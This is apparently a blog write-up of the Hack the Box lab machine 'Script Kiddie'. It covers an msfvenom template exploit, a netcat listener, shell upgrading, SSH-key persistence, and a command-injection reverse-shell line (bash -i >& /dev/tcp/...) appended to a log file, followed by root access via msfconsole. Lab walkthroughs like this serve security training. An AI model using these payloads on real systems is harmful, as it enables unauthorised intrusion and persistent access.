Hack the Box - Script Kiddie

hack the box Jun 5, 2021

Welcome back everyone! Today we are going to do the Hack the Box machine Script Kiddie. This is a Linux machine rated as easy. Let's jump in!

As always, we kick of our scans with nmap - nmap -sC -sV -p- -oA allscan

Here are our results:

Nmap scan report for
Host is up (0.049s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)5000/tcp  open     http    Werkzeug httpd 0.16.1 (Python 3.8.5)|_http-server-header: Werkzeug/0.16.1 Python/3.8.5|_http-title: k1d'5 h4ck3r t00l559012/tcp filtered unknownService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There isn't much to go with. We see a webserver on port 5000 and that's about it. Let's take a look.

We see a basic hacking tool interface. We can scan an IP address or create payloads. We have the ability to upload a payload template as well. We test out the page and sure enough it does generate some payloads. Some googling around leads us here. A MSF Venom template CVE and PoC.

We can find this template in Metasploit. If we search for template in MSF we see the module:

We list out our options. We have pretty much the basics, an lport and lhost.

We'll add our IP and port and generate the payload.

We can even do the following to spin up an automatic payload handler within MSF if we want. I often do this, but in this case, we'll use netcat.

msf6> set DisablePayloadHandler false

Running the exploit shows us the path the file is saved. We'll copy out the payload and upload it to our web interface we found before. We also need to have a listener running.

nc -lvnp 4444

We can then set our localhost on the website to and the platform to android.

Once we hit generate, we should catch a connection back.

Now we want to upgrade this shell. First, we check for Python and Python3.

which python
which python3

We see Python3 installed so we'll upgrade our shell with that.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now with a better shell connection, we can look around. This account does contant the user.txt flag, awesome! Now we can start enumerating for the root.txt flag.

Next we want to find a better way tro stay connected. We can append our ssh key to the authorized_keys file for this user. First we'll want to make a new key with ssh-keygen.


We can copy the id_rsa.pub content into the authorized_keys file. Now we can just ssh into the box.

ssh -i id_rsa kid@

Now that w're in, we don't even have to load linenum.sh or any other enumeration tools. We are able to manually access the pwn user account and freely look around to start.

Inside the pwn user account, we see a file called scanlosers.sh with the following code:



cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Can you spot the problem with this script? That's right, we can command injection into this. After some trial and error we find a command we can append the the hackers file to get a shell back.

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' #" >> hackers

We quickly see the shell returned as pwn.

However, pwn cannot access root.txt. So we need to look around some more. Basic enumeration shows us that we can run msfconsole as root.

Awesome, let's do that. When the console loads, we get a bunch of ioctl errors but when we check our ID, we are running as root.

Now we can simply cat the root.txt flag!

A nice easy box with some required research and trial / error.

If you found this write-up useful, send some respect my way:


Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.